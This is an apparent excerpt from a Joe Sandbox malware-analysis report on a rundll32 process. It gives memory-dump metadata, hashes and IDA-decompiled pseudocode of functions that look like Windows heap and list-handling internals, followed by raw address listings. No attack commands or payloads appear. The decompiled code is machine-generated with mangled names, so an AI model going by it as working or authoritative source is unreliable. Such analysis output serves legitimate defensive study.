                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                • Instruction ID: 12b3a0c5df4c90c9c2090efeec364f16b9b16e7072aa17de9ff34f24e35067eb
                                                                                                                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                • Instruction Fuzzy Hash: 282104316016908FEF229B29CA84B6637E8FF40340F5900E7DC048B392E774FC42C690
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04487794 Relevance: .1, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E04487794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x44f7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0444F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04427D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04449AE0();
					_t24 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                                                0x04487799
                                                                                                                0x0448779a
                                                                                                                0x0448779b
                                                                                                                0x044877a3
                                                                                                                0x044877ab
                                                                                                                0x044877ae
                                                                                                                0x044877b1
                                                                                                                0x044877b1
                                                                                                                0x044877bf
                                                                                                                0x044877c4
                                                                                                                0x044877c8
                                                                                                                0x044877ce
                                                                                                                0x044877d4
                                                                                                                0x044877e0
                                                                                                                0x044877e0
                                                                                                                0x044877d6
                                                                                                                0x044877d6
                                                                                                                0x044877de
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044877de
                                                                                                                0x044877e5
                                                                                                                0x044877f0
                                                                                                                0x044877f3
                                                                                                                0x044877f6
                                                                                                                0x044877fd
                                                                                                                0x04487800
                                                                                                                0x0448780c
                                                                                                                0x04487818
                                                                                                                0x0448782b
                                                                                                                0x0448781a
                                                                                                                0x04487823
                                                                                                                0x04487823
                                                                                                                0x04487830
                                                                                                                0x04487831
                                                                                                                0x04487838
                                                                                                                0x0448783d
                                                                                                                0x0448783e
                                                                                                                0x0448784f
                                                                                                                0x0448784f
                                                                                                                0x0448785a

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e31feadeac2f96edc9a504ea3b5d5a4dcebe69ea35933ba7f3eeca017a50bf40
                                                                                                                • Instruction ID: b99e3faf4708362eeabc8c05298fed4cab0c73e0c66c808d53a1ffba11a16da5
                                                                                                                • Opcode Fuzzy Hash: e31feadeac2f96edc9a504ea3b5d5a4dcebe69ea35933ba7f3eeca017a50bf40
                                                                                                                • Instruction Fuzzy Hash: D5219D72900A44ABDB25EF69DC90E6BB7B8EF88740F10056EE50AD7750E634F900CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443FD9B Relevance: .1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0443FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E044176E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                                                0x0443fd9b
                                                                                                                0x0443fda0
                                                                                                                0x0443fda1
                                                                                                                0x0443fdab
                                                                                                                0x0443fdad
                                                                                                                0x0443fdb0
                                                                                                                0x0443fdb8
                                                                                                                0x0443fe0f
                                                                                                                0x0443fde6
                                                                                                                0x0443fde9
                                                                                                                0x0443fdec
                                                                                                                0x0447c0c0
                                                                                                                0x0443fdfe
                                                                                                                0x0443fe06
                                                                                                                0x0443fe06
                                                                                                                0x0447c0c8
                                                                                                                0x0443fe2d
                                                                                                                0x0443fe2d
                                                                                                                0x00000000
                                                                                                                0x0443fe2d
                                                                                                                0x0447c0d1
                                                                                                                0x0447c0e0
                                                                                                                0x0447c0e5
                                                                                                                0x0447c0e5
                                                                                                                0x0447c0e8
                                                                                                                0x00000000
                                                                                                                0x0447c0e8
                                                                                                                0x0443fdf4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443fdf6
                                                                                                                0x0443fdfa
                                                                                                                0x0443fe1a
                                                                                                                0x0443fe1f
                                                                                                                0x0443fe1f
                                                                                                                0x0443fdfc
                                                                                                                0x00000000
                                                                                                                0x0443fdfc
                                                                                                                0x0443fdcc
                                                                                                                0x0443fdd0
                                                                                                                0x0443fe26
                                                                                                                0x00000000
                                                                                                                0x0443fe26
                                                                                                                0x0443fdd8
                                                                                                                0x0443fddb
                                                                                                                0x0443fddd
                                                                                                                0x0443fde0
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                • Instruction ID: b669239bb6aae13467fc4dfa9614b308f55c92613f07914d6fd610a4deedfdd9
                                                                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                • Instruction Fuzzy Hash: 32217C72A00640DFDB31CF4AC644A66B7E5EB98F11F24816FE94687B11E734BC05DB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04409240 Relevance: .1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E04409240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x44df708);
				E0445D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E044495D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E044495D0();
				_t33 =  *0x44f84c4; // 0x0
				L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x44f84c4; // 0x0
				L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x44f84c4; // 0x0
				E04422280(L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x44f86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E044495D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E044495D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04409325();
					_t50 =  *0x44f84c4; // 0x0
					return E0445D0D1(L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                                                0x04409240
                                                                                                                0x04409242
                                                                                                                0x04409247
                                                                                                                0x0440924c
                                                                                                                0x0440924e
                                                                                                                0x04409255
                                                                                                                0x04409257
                                                                                                                0x0440925a
                                                                                                                0x0440925f
                                                                                                                0x0440925f
                                                                                                                0x04409266
                                                                                                                0x04409271
                                                                                                                0x04409276
                                                                                                                0x04409279
                                                                                                                0x0440927e
                                                                                                                0x04409295
                                                                                                                0x0440929a
                                                                                                                0x044092b1
                                                                                                                0x044092b6
                                                                                                                0x044092d7
                                                                                                                0x044092dc
                                                                                                                0x044092e0
                                                                                                                0x044092e6
                                                                                                                0x044092e8
                                                                                                                0x044092ee
                                                                                                                0x04409332
                                                                                                                0x04409333
                                                                                                                0x04409337
                                                                                                                0x04409338
                                                                                                                0x0440933a
                                                                                                                0x0440933a
                                                                                                                0x0440933d
                                                                                                                0x04409342
                                                                                                                0x04409342
                                                                                                                0x04409345
                                                                                                                0x04409349
                                                                                                                0x0440934e
                                                                                                                0x04409352
                                                                                                                0x04409357
                                                                                                                0x044092f4
                                                                                                                0x044092f4
                                                                                                                0x044092f6
                                                                                                                0x044092f9
                                                                                                                0x04409300
                                                                                                                0x04409306
                                                                                                                0x04409324
                                                                                                                0x04409324

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8959ee18cc0d0f200f3730e3b4ea42a8eb968e08e99eac551f8b9ac3452e0324
                                                                                                                • Instruction ID: 40186fab7eac15753aafa49586423de25510731b993383468bdafd1ad1189111
                                                                                                                • Opcode Fuzzy Hash: 8959ee18cc0d0f200f3730e3b4ea42a8eb968e08e99eac551f8b9ac3452e0324
                                                                                                                • Instruction Fuzzy Hash: A1213971041600DFEB21EF29CA00B56B7B9FF18708F14866EA109866A2DB34F951CB44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443B390 Relevance: .1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 54%
                                                                                                                			E0443B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04422280(_t12, 0x44f8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E044400C2(0x44f8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                                                0x0443b395
                                                                                                                0x0443b3a2
                                                                                                                0x0443b3a5
                                                                                                                0x0443b3aa
                                                                                                                0x0443b3b2
                                                                                                                0x0443b3ba
                                                                                                                0x0443b3bd
                                                                                                                0x0443b3c0
                                                                                                                0x0443b3c4
                                                                                                                0x0443b3c9
                                                                                                                0x0447a3e9
                                                                                                                0x0447a3ed
                                                                                                                0x0447a3f0
                                                                                                                0x0447a3ff
                                                                                                                0x0447a403
                                                                                                                0x0447a409
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447a40b
                                                                                                                0x0447a40b
                                                                                                                0x0447a40f
                                                                                                                0x0447a415
                                                                                                                0x0447a423
                                                                                                                0x0447a423
                                                                                                                0x0447a415
                                                                                                                0x0443b3d1
                                                                                                                0x0443b3e8
                                                                                                                0x0443b3e8
                                                                                                                0x0443b3d9

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e1a293c2519cf1a989cf7fecc9ff52e51173f0fd41cb73550d4bb1717e966c6d
                                                                                                                • Instruction ID: a1dd672e5f1f2a784d1c226ee8fd4fdb4bf33fdb490020a55497003b2bbd72cf
                                                                                                                • Opcode Fuzzy Hash: e1a293c2519cf1a989cf7fecc9ff52e51173f0fd41cb73550d4bb1717e966c6d
                                                                                                                • Instruction Fuzzy Hash: 471148333051209BEF299E258D81A6B7256EBC9730B24012FDA16DB381DE35BC02C691
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04494257 Relevance: .1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E04494257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x44e08d0);
				E0445D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E044941E8(__ebx, __edi, __ecx, _t39);
				E0441EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x44f87e4;
					_t18 =  *0x44f87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x44f5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x44f87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x44f87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04407055(_t31 + 0xfffffff8);
								_t24 =  *0x44f87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x44f87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x44f5cd0;
				if( *0x44f5cd0 <= 0) {
					L04407055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x44f87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x44f87e8 = _t30;
						 *0x44f87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0445D0D1(L04494320());
			}















                                                                                                                0x04494257
                                                                                                                0x04494257
                                                                                                                0x04494257
                                                                                                                0x04494259
                                                                                                                0x0449425e
                                                                                                                0x04494263
                                                                                                                0x04494265
                                                                                                                0x04494273
                                                                                                                0x04494278
                                                                                                                0x0449427c
                                                                                                                0x0449427f
                                                                                                                0x04494281
                                                                                                                0x04494287
                                                                                                                0x044942d7
                                                                                                                0x044942d7
                                                                                                                0x044942da
                                                                                                                0x0449428d
                                                                                                                0x0449428d
                                                                                                                0x0449428f
                                                                                                                0x04494292
                                                                                                                0x04494297
                                                                                                                0x0449429c
                                                                                                                0x044942a0
                                                                                                                0x044942a6
                                                                                                                0x044942a8
                                                                                                                0x044942ae
                                                                                                                0x044942b3
                                                                                                                0x00000000
                                                                                                                0x044942ba
                                                                                                                0x044942ba
                                                                                                                0x044942bf
                                                                                                                0x044942c5
                                                                                                                0x044942ca
                                                                                                                0x044942cf
                                                                                                                0x044942d0
                                                                                                                0x00000000
                                                                                                                0x044942d0
                                                                                                                0x044942b3
                                                                                                                0x00000000
                                                                                                                0x044942a6
                                                                                                                0x0449429c
                                                                                                                0x044942dc
                                                                                                                0x044942dc
                                                                                                                0x044942e3
                                                                                                                0x04494309
                                                                                                                0x044942e5
                                                                                                                0x044942e5
                                                                                                                0x044942e8
                                                                                                                0x044942ee
                                                                                                                0x044942f0
                                                                                                                0x00000000
                                                                                                                0x044942f2
                                                                                                                0x044942f2
                                                                                                                0x044942f4
                                                                                                                0x044942f7
                                                                                                                0x044942f9
                                                                                                                0x04494300
                                                                                                                0x04494300
                                                                                                                0x044942f0
                                                                                                                0x0449430e
                                                                                                                0x0449431f

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 09138de35c17ca446ba492c46df6b474d3ec2bdc72a3e9c1b0c1bf47122a33af
                                                                                                                • Instruction ID: 6357584eaa9ee6bb324536dfe3780b8450b7ab07fbdc102ca24e7b2757e3f3b8
                                                                                                                • Opcode Fuzzy Hash: 09138de35c17ca446ba492c46df6b474d3ec2bdc72a3e9c1b0c1bf47122a33af
                                                                                                                • Instruction Fuzzy Hash: E7213870605A01DFEF28EF66D900615FBE1FB45358B20826FC1158F291EB39BC52DB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044846A7 Relevance: .1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E044846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0444F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0443D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L044277F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                                                0x044846b7
                                                                                                                0x044846ba
                                                                                                                0x044846c5
                                                                                                                0x044846c8
                                                                                                                0x044846d0
                                                                                                                0x044846d4
                                                                                                                0x044846e6
                                                                                                                0x044846e9
                                                                                                                0x044846f4
                                                                                                                0x044846ff
                                                                                                                0x04484705
                                                                                                                0x04484706
                                                                                                                0x0448470c
                                                                                                                0x04484713
                                                                                                                0x0448471b
                                                                                                                0x04484723
                                                                                                                0x04484725
                                                                                                                0x044846d6
                                                                                                                0x044846d9
                                                                                                                0x044846db
                                                                                                                0x044846db
                                                                                                                0x04484732

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                • Instruction ID: 9f2099cde6c0aed08c823fb7001e2aac133161561e2aab86402bdea907a4f7a9
                                                                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                • Instruction Fuzzy Hash: 95112572904208BBDB019F5DD8808BEB7B9EF95304F10806EF944C7351DA31AE55D7A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04432397 Relevance: .1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 34%
                                                                                                                			E04432397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x44f848c != 0) {
					L0442FAD0(0x44f8610);
					if( *0x44f848c == 0) {
						E0442FA00(0x44f8610, _t19, _t27, 0x44f8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04432581(0x44f8610, 0x43e50a0, _t26, _t27, _t28);
						E0442FA00(0x44f8610, 0x43e50a0, _t27, 0x44f8610);
					}
				} else {
					L1:
					_t11 =  *0x44f8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04444886(0x43e1088, 1, 0x44f8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04432581(0x44f8610, (_t11 << 4) + 0x43e5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                                                0x044323b0
                                                                                                                0x044323b6
                                                                                                                0x04432409
                                                                                                                0x04432415
                                                                                                                0x04475ae9
                                                                                                                0x00000000
                                                                                                                0x0443241b
                                                                                                                0x0443241b
                                                                                                                0x0443241d
                                                                                                                0x04432427
                                                                                                                0x0443242e
                                                                                                                0x04432430
                                                                                                                0x04432430
                                                                                                                0x044323b8
                                                                                                                0x044323b8
                                                                                                                0x044323b8
                                                                                                                0x044323bf
                                                                                                                0x044323fc
                                                                                                                0x044323fc
                                                                                                                0x044323c1
                                                                                                                0x044323c3
                                                                                                                0x044323d0
                                                                                                                0x044323d8
                                                                                                                0x044323d8
                                                                                                                0x044323dc
                                                                                                                0x044323de
                                                                                                                0x044323e1
                                                                                                                0x044323e1
                                                                                                                0x044323ec

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 99a28f266f51eba7090a2351e40d823f84999f13a424ebc8f1536e4a5810186c
                                                                                                                • Instruction ID: 1dfae4be081724a45e82d65de66bcec9e7eb87edb4d344b19a00078ccdded8e8
                                                                                                                • Opcode Fuzzy Hash: 99a28f266f51eba7090a2351e40d823f84999f13a424ebc8f1536e4a5810186c
                                                                                                                • Instruction Fuzzy Hash: 1211083270071067FF30AA3A9C41B26B298FB54F65F54446BF602AB282DBF4FC459655
                                                                                                                Uniqueness

